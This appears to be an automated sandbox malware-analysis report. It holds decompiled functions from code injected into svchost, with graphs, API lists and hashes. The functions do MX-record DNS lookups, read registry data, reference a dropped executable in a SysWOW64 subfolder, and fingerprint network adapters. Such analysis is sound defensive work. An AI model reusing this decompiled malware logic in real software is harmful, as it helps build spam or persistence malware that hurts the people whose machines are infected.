                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEventExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404124870-0
                                                                                                                                  • Opcode ID: 899eb82b1b5377c60112b2498042b9d5d73dff81a035bb9bb2e7769f26f4c2ec
                                                                                                                                  • Instruction ID: 22833779bfc287bbd5fbd402600bf1b69e0002d0e5067e79e887ff9f676f1fca
                                                                                                                                  • Opcode Fuzzy Hash: 899eb82b1b5377c60112b2498042b9d5d73dff81a035bb9bb2e7769f26f4c2ec
                                                                                                                                  • Instruction Fuzzy Hash: CF518FB1D8021ABBFB20AAA0DC45FBF7A7DFB55714F000465FA10B60C0E7358A45DB69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02512D21 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85memorylibrarystringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1234 2512d21-2512d44 GetModuleHandleA 1235 2512d46-2512d52 LoadLibraryA 1234->1235 1236 2512d5b-2512d69 GetProcAddress 1234->1236 1235->1236 1237 2512d54-2512d56 1235->1237 1236->1237 1238 2512d6b-2512d7b DnsQuery_A 1236->1238 1239 2512dee-2512df1 1237->1239 1238->1237 1240 2512d7d-2512d88 1238->1240 1241 2512deb 1240->1241 1242 2512d8a-2512d8b 1240->1242 1241->1239 1243 2512d90-2512d95 1242->1243 1244 2512de2-2512de8 1243->1244 1245 2512d97-2512daa GetProcessHeap HeapAlloc 1243->1245 1244->1243 1246 2512dea 1244->1246 1245->1246 1247 2512dac-2512dd9 call 251ee2a lstrcpynA 1245->1247 1246->1241 1250 2512de0 1247->1250 1251 2512ddb-2512dde 1247->1251 1250->1244 1251->1244
                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E02512D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				void* _t22;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_t35 =  &_v16;
					_t22 =  *_t20(_a4, 0xf, _t39, _t39,  &_v16, _t39); // executed
					if(_t22 != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0251EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}















                                                                                                                                  0x02512d31
                                                                                                                                  0x02512d32
                                                                                                                                  0x02512d33
                                                                                                                                  0x02512d39
                                                                                                                                  0x02512d3a
                                                                                                                                  0x02512d40
                                                                                                                                  0x02512d44
                                                                                                                                  0x02512d5b
                                                                                                                                  0x02512d61
                                                                                                                                  0x02512d69
                                                                                                                                  0x02512d54
                                                                                                                                  0x00000000
                                                                                                                                  0x02512d54
                                                                                                                                  0x02512d6c
                                                                                                                                  0x02512d77
                                                                                                                                  0x02512d7b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512d7d
                                                                                                                                  0x02512d80
                                                                                                                                  0x02512d83
                                                                                                                                  0x02512d88
                                                                                                                                  0x02512deb
                                                                                                                                  0x00000000
                                                                                                                                  0x02512deb
                                                                                                                                  0x02512d90
                                                                                                                                  0x02512d95
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512da6
                                                                                                                                  0x02512daa
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512db0
                                                                                                                                  0x02512db9
                                                                                                                                  0x02512dc1
                                                                                                                                  0x02512dc7
                                                                                                                                  0x02512dcb
                                                                                                                                  0x02512dd1
                                                                                                                                  0x02512dd4
                                                                                                                                  0x02512dd9
                                                                                                                                  0x02512de0
                                                                                                                                  0x02512ddb
                                                                                                                                  0x02512ddb
                                                                                                                                  0x02512ddb
                                                                                                                                  0x02512de2
                                                                                                                                  0x02512de2
                                                                                                                                  0x02512de4
                                                                                                                                  0x02512de6
                                                                                                                                  0x00000000
                                                                                                                                  0x02512dea
                                                                                                                                  0x02512d4a
                                                                                                                                  0x02512d52
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,02512F01,?,025120FF,02522000), ref: 02512D3A
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 02512D4A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02512D61
                                                                                                                                  • DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,?,00000000), ref: 02512D77
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 02512D99
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 02512DA0
                                                                                                                                  • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 02512DCB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcessQuery_lstrcpyn
                                                                                                                                  • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                  • API String ID: 233223969-3847274415
                                                                                                                                  • Opcode ID: d4b39545a231d987391218a2ad8d82557b2848b1734b648298a6d11b7ee796dd
                                                                                                                                  • Instruction ID: 14d6d940f694e6f9b8b847ce061379e2d3c797c41037b6e6ef74985bb758e164
                                                                                                                                  • Opcode Fuzzy Hash: d4b39545a231d987391218a2ad8d82557b2848b1734b648298a6d11b7ee796dd
                                                                                                                                  • Instruction Fuzzy Hash: 84219071D41236ABEB219F54DC48AAEBFB8FF19B50F014416F805E3180D370998A8BD8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 025180C9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1252 25180c9-25180ed call 2516ec3 1255 25180f9-2518115 call 251704c 1252->1255 1256 25180ef call 2517ee6 1252->1256 1261 2518225-251822b 1255->1261 1262 251811b-2518121 1255->1262 1259 25180f4 1256->1259 1259->1261 1264 251822d-2518233 1261->1264 1265 251826c-2518273 1261->1265 1262->1261 1263 2518127-251812a 1262->1263 1263->1261 1266 2518130-2518167 call 2512544 RegOpenKeyExA 1263->1266 1264->1265 1267 2518235-251823f call 251675c 1264->1267 1273 2518216-2518222 call 251ee2a 1266->1273 1274 251816d-251818b RegQueryValueExA 1266->1274 1270 2518244-251824b 1267->1270 1270->1265 1272 251824d-2518269 call 25124c2 call 251ec2e 1270->1272 1272->1265 1273->1261 1276 25181f7-25181fe 1274->1276 1277 251818d-2518191 1274->1277 1280 2518200-2518206 call 251ec2e 1276->1280 1281 251820d-2518210 RegCloseKey 1276->1281 1277->1276 1282 2518193-2518196 1277->1282 1290 251820c 1280->1290 1281->1273 1282->1276 1286 2518198-25181a8 call 251ebcc 1282->1286 1286->1281 1292 25181aa-25181c2 RegQueryValueExA 1286->1292 1290->1281 1292->1276 1293 25181c4-25181ca 1292->1293 1294 25181cd-25181d2 1293->1294 1294->1294 1295 25181d4-25181e5 call 251ebcc 1294->1295 1295->1281 1298 25181e7-25181f5 call 251ef00 1295->1298 1298->1290
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E025180C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				char _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x2522c3c = 0;
				 *0x2522c38 = 0;
				if(E02516EC3() != 0) {
					_t27 = E0251704C(0x2520264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E02512544(0x25222f8,  &E025206AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0251EE2A(_t56, 0x25222f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x2522c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0251EC2E(_t42);
							 *0x2522c3c = 0;
							goto L17;
						} else {
							_t45 = E0251EBCC(_v8);
							_pop(_t56);
							 *0x2522c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0251EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x2522c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0251EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E02517EE6(_t56); // executed
					L20:
					_t70 = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
					if(_t70 != 0) {
						_t71 =  *0x25221a4; // 0x47a00
						if(_t71 == 0) {
							_t31 = E0251675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v20, 0); // executed
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x25222d4 = E025124C2(_t61, _t63, 0);
								 *0x25221a4 = _t63;
								E0251EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}























                                                                                                                                  0x025180c9
                                                                                                                                  0x025180d7
                                                                                                                                  0x025180da
                                                                                                                                  0x025180e0
                                                                                                                                  0x025180ed
                                                                                                                                  0x0251810b
                                                                                                                                  0x02518110
                                                                                                                                  0x02518115
                                                                                                                                  0x00000000
                                                                                                                                  0x02518130
                                                                                                                                  0x02518151
                                                                                                                                  0x02518156
                                                                                                                                  0x02518167
                                                                                                                                  0x02518216
                                                                                                                                  0x0251821d
                                                                                                                                  0x02518222
                                                                                                                                  0x00000000
                                                                                                                                  0x02518222
                                                                                                                                  0x0251818b
                                                                                                                                  0x025181f7
                                                                                                                                  0x025181f7
                                                                                                                                  0x025181fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518201
                                                                                                                                  0x02518206
                                                                                                                                  0x00000000
                                                                                                                                  0x02518198
                                                                                                                                  0x0251819b
                                                                                                                                  0x025181a0
                                                                                                                                  0x025181a1
                                                                                                                                  0x025181a8
                                                                                                                                  0x0251820d
                                                                                                                                  0x02518210
                                                                                                                                  0x00000000
                                                                                                                                  0x02518210
                                                                                                                                  0x025181aa
                                                                                                                                  0x025181c2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025181c4
                                                                                                                                  0x025181ca
                                                                                                                                  0x025181cd
                                                                                                                                  0x025181cd
                                                                                                                                  0x025181cf
                                                                                                                                  0x025181d0
                                                                                                                                  0x025181d8
                                                                                                                                  0x025181dd
                                                                                                                                  0x025181de
                                                                                                                                  0x025181e5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025181ef
                                                                                                                                  0x0251820c
                                                                                                                                  0x0251820c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251820c
                                                                                                                                  0x0251818b
                                                                                                                                  0x025180ef
                                                                                                                                  0x025180ef
                                                                                                                                  0x02518225
                                                                                                                                  0x02518225
                                                                                                                                  0x0251822b
                                                                                                                                  0x0251822d
                                                                                                                                  0x02518233
                                                                                                                                  0x0251823f
                                                                                                                                  0x02518244
                                                                                                                                  0x0251824b
                                                                                                                                  0x0251824d
                                                                                                                                  0x02518259
                                                                                                                                  0x0251825e
                                                                                                                                  0x02518264
                                                                                                                                  0x02518269
                                                                                                                                  0x0251824b
                                                                                                                                  0x02518233
                                                                                                                                  0x02518273
                                                                                                                                  0x02518273

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 0251815F
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0251A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 02518187
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0251A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 025181BE
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 02518210
                                                                                                                                    • Part of subcall function 0251675C: SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0251677E
                                                                                                                                    • Part of subcall function 0251675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0251679A
                                                                                                                                    • Part of subcall function 0251675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 025167B0
                                                                                                                                    • Part of subcall function 0251675C: SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 025167BF
                                                                                                                                    • Part of subcall function 0251675C: GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 025167D3
                                                                                                                                    • Part of subcall function 0251675C: ReadFile.KERNEL32(000000FF,?,00000040,02518244,00000000,?,761B43E0,00000000), ref: 02516807
                                                                                                                                    • Part of subcall function 0251675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0251681F
                                                                                                                                    • Part of subcall function 0251675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0251683E
                                                                                                                                    • Part of subcall function 0251675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0251685C
                                                                                                                                    • Part of subcall function 0251EC2E: GetProcessHeap.KERNEL32(00000000,0251EA27,00000000,0251EA27,00000000), ref: 0251EC41
                                                                                                                                    • Part of subcall function 0251EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0251EC48
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe
                                                                                                                                  • API String ID: 124786226-910841113
                                                                                                                                  • Opcode ID: 195131aeb19afff00c017e9814796cbf1945ed05e28201348bd694665c207d31
                                                                                                                                  • Instruction ID: 54303bda8f6a70231a2e99a796cb41f19b9405e9e69fb57d7e8fcb83c8db141e
                                                                                                                                  • Opcode Fuzzy Hash: 195131aeb19afff00c017e9814796cbf1945ed05e28201348bd694665c207d31
                                                                                                                                  • Instruction Fuzzy Hash: AD41A3B2C41119BFFB25AFA0DC85DBE7B6DBB05304F100866E911E3080E7309A48DB5C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02511AC3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74libraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1301 2511ac3-2511adc LoadLibraryA 1302 2511ae2-2511af3 GetProcAddress 1301->1302 1303 2511b6b-2511b70 1301->1303 1304 2511af5-2511b01 1302->1304 1305 2511b6a 1302->1305 1306 2511b1c-2511b27 GetAdaptersAddresses 1304->1306 1305->1303 1307 2511b03-2511b12 call 251ebed 1306->1307 1308 2511b29-2511b2b 1306->1308 1307->1308 1317 2511b14-2511b1b 1307->1317 1310 2511b5b-2511b5e 1308->1310 1311 2511b2d-2511b32 1308->1311 1314 2511b69 1310->1314 1315 2511b60-2511b68 call 251ec2e 1310->1315 1313 2511b34-2511b3b 1311->1313 1311->1314 1318 2511b54-2511b59 1313->1318 1319 2511b3d-2511b52 1313->1319 1314->1305 1315->1314 1317->1306 1318->1310 1318->1313 1319->1318 1319->1319
                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E02511AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t23 =  *_t28(2, 0, 0); // executed
					_t41 = _t23;
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0251EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0251EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}














                                                                                                                                  0x02511ad1
                                                                                                                                  0x02511ad4
                                                                                                                                  0x02511adc
                                                                                                                                  0x02511b6b
                                                                                                                                  0x02511b70
                                                                                                                                  0x02511b70
                                                                                                                                  0x02511aef
                                                                                                                                  0x02511af3
                                                                                                                                  0x02511b6a
                                                                                                                                  0x00000000
                                                                                                                                  0x02511b6a
                                                                                                                                  0x02511af9
                                                                                                                                  0x02511afa
                                                                                                                                  0x02511afd
                                                                                                                                  0x02511b00
                                                                                                                                  0x02511b1c
                                                                                                                                  0x02511b20
                                                                                                                                  0x02511b22
                                                                                                                                  0x02511b27
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511b09
                                                                                                                                  0x02511b12
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511b17
                                                                                                                                  0x02511b18
                                                                                                                                  0x02511b1b
                                                                                                                                  0x02511b1b
                                                                                                                                  0x02511b2b
                                                                                                                                  0x02511b5b
                                                                                                                                  0x02511b5e
                                                                                                                                  0x02511b63
                                                                                                                                  0x02511b68
                                                                                                                                  0x02511b69
                                                                                                                                  0x00000000
                                                                                                                                  0x02511b69
                                                                                                                                  0x02511b2d
                                                                                                                                  0x02511b32
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511b34
                                                                                                                                  0x02511b34
                                                                                                                                  0x02511b34
                                                                                                                                  0x02511b37
                                                                                                                                  0x02511b3b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511b3d
                                                                                                                                  0x02511b3d
                                                                                                                                  0x02511b4c
                                                                                                                                  0x02511b4f
                                                                                                                                  0x02511b50
                                                                                                                                  0x02511b54
                                                                                                                                  0x02511b54
                                                                                                                                  0x02511b57
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 02511AD4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 02511AE9
                                                                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 02511B20
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdaptersAddressAddressesLibraryLoadProc
                                                                                                                                  • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                                                                  • API String ID: 3646706440-1087626847
                                                                                                                                  • Opcode ID: 9cf71ec561401baf32848bbd3990e9135a7663cc07a97a3a683c26c10f326140
                                                                                                                                  • Instruction ID: 7b37e5788afd19b1db94644963ff462440fecad46e1250fa63d543a21cdd7f5f
                                                                                                                                  • Opcode Fuzzy Hash: 9cf71ec561401baf32848bbd3990e9135a7663cc07a97a3a683c26c10f326140
                                                                                                                                  • Instruction Fuzzy Hash: 2411DA71E02534AFEB159BA9DC85CEDBFB9FB44B10B158096E109A7140E7305A44DB9C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251E3CA Relevance: 7.6, APIs: 5, Instructions: 136registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1321 251e3ca-251e3ee RegOpenKeyExA 1322 251e3f4-251e3fb 1321->1322 1323 251e528-251e52d 1321->1323 1324 251e3fe-251e403 1322->1324 1324->1324 1325 251e405-251e40f 1324->1325 1326 251e411-251e413 1325->1326 1327 251e414-251e452 call 251ee08 call 251f1ed RegQueryValueExA 1325->1327 1326->1327 1332 251e458-251e486 call 251f1ed RegQueryValueExA 1327->1332 1333 251e51d-251e527 RegCloseKey 1327->1333 1336 251e488-251e48a 1332->1336 1333->1323 1336->1333 1337 251e490-251e4a1 call 251db2e 1336->1337 1337->1333 1340 251e4a3-251e4a6 1337->1340 1341 251e4a9-251e4d3 call 251f1ed RegQueryValueExA 1340->1341 1344 251e4d5-251e4da 1341->1344 1345 251e4e8-251e4ea 1341->1345 1344->1345 1346 251e4dc-251e4e6 1344->1346 1345->1333 1347 251e4ec-251e516 call 2512544 call 251e332 1345->1347 1346->1341 1346->1345 1347->1333
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				long _t50;
				intOrPtr* _t52;
				int _t69;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				_t50 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16); // executed
				if(_t50 != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x25228f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0251EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0251F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0251F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0251DB2E(_t89);
					_t69 =  *0x25236c4; // 0x0
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0251F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						_t75 =  *0x25236c4; // 0x0
						E02512544(_t75, _t75, _v32, 0xe4, 0xc8);
						E0251E332(_t82, _t106,  *0x25236c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}

























                                                                                                                                  0x0251e3ca
                                                                                                                                  0x0251e3e0
                                                                                                                                  0x0251e3e6
                                                                                                                                  0x0251e3ee
                                                                                                                                  0x0251e528
                                                                                                                                  0x0251e52d
                                                                                                                                  0x0251e52d
                                                                                                                                  0x0251e3f4
                                                                                                                                  0x0251e3f9
                                                                                                                                  0x0251e3fb
                                                                                                                                  0x0251e3fb
                                                                                                                                  0x0251e3fe
                                                                                                                                  0x0251e3fe
                                                                                                                                  0x0251e400
                                                                                                                                  0x0251e401
                                                                                                                                  0x0251e407
                                                                                                                                  0x0251e409
                                                                                                                                  0x0251e40f
                                                                                                                                  0x0251e413
                                                                                                                                  0x0251e413
                                                                                                                                  0x0251e41c
                                                                                                                                  0x0251e421
                                                                                                                                  0x0251e429
                                                                                                                                  0x0251e42c
                                                                                                                                  0x0251e42f
                                                                                                                                  0x0251e43a
                                                                                                                                  0x0251e452
                                                                                                                                  0x0251e51d
                                                                                                                                  0x0251e520
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e458
                                                                                                                                  0x0251e458
                                                                                                                                  0x0251e458
                                                                                                                                  0x0251e45b
                                                                                                                                  0x0251e463
                                                                                                                                  0x0251e469
                                                                                                                                  0x0251e46e
                                                                                                                                  0x0251e484
                                                                                                                                  0x0251e48a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e491
                                                                                                                                  0x0251e494
                                                                                                                                  0x0251e499
                                                                                                                                  0x0251e4a1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e4a3
                                                                                                                                  0x0251e4a6
                                                                                                                                  0x0251e4a9
                                                                                                                                  0x0251e4ae
                                                                                                                                  0x0251e4b4
                                                                                                                                  0x0251e4b9
                                                                                                                                  0x0251e4d3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e4d5
                                                                                                                                  0x0251e4da
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e4dc
                                                                                                                                  0x0251e4df
                                                                                                                                  0x0251e4e1
                                                                                                                                  0x0251e4e6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
